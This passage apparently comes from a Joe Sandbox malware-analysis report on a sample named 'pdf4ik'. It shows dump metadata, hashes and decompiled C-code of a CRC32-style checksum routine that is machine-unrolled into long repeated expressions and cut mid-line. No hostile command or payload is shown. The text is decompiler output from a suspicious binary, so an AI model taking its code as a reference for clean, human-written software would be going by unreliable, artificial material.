4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcd9b0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
							_t46 =  &(_t46[8]);
							_t47 = _t47 - 8;
							_t80 = _t80 - 1;
						} while (_t80 != 0);
					}
					if(_t47 != 0) {
						do {
							_t27 = _t27 >> 0x00000008 ^  *(0x29dcd9b0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4);
							_t46 =  &(_t46[1]);
							_t47 = _t47 - 1;
						} while (_t47 != 0);
					}
					return  !_t27;
				} else {
					return 0;
				}
			}








                                        0x29daba00
                                        0x29daba00
                                        0x29daba02
                                        0x29daba08
                                        0x29daba0d
                                        0x29daba15
                                        0x29daba20
                                        0x29dabac8
                                        0x29dabacf
                                        0x29dabad2
                                        0x29dabad5
                                        0x29dabad5
                                        0x29dabadc
                                        0x29dabadf
                                        0x29dabae1
                                        0x29dabaef
                                        0x29dabaf6
                                        0x29dabaf7
                                        0x29dabaf7
                                        0x29dabae1
                                        0x29dabafd
                                        0x29daba04
                                        0x29daba06
                                        0x29daba06

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69e8c224211d784b60508170526fa135229d53699d46c8370d9cbfb8f07f57ce
                                        • Instruction ID: 70104cee9f69402aa2e9c37e8783a15f8f44cd756f92f82baa4267b2ffa63fae
                                        • Opcode Fuzzy Hash: 69e8c224211d784b60508170526fa135229d53699d46c8370d9cbfb8f07f57ce
                                        • Instruction Fuzzy Hash: 5C216D339B84F701D3A09E319C0426227D3DFCB206F6F81B9C68887542DA7DD113A131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8BC60 Relevance: .1, Instructions: 70COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D8BC60(signed char* __ecx, unsigned int __edx) {
				signed int _t26;
				signed int _t27;
				signed char* _t46;
				unsigned int _t47;
				unsigned int _t80;

				_t47 = __edx;
				_t46 = __ecx;
				if(__ecx != 0) {
					_t27 =  !_t26;
					if(__edx >= 8) {
						_t80 = __edx >> 3;
						do {
							_t27 = (((((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[7] & 0x000000ff ^ ((((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[5] & 0x000000ff ^ ((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[6] & 0x000000ff ^ (((((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[3] & 0x000000ff ^ ((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[2] & 0x000000ff ^ (_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[4] & 0x000000ff ^ (((_t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x29dcf2e0 + ((_t46[1] & 0x000000ff ^ _t27 >> 0x00000008 ^  *(0x29dcf2e0 + (( *_t46 & 0x000000ff ^ _t27) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  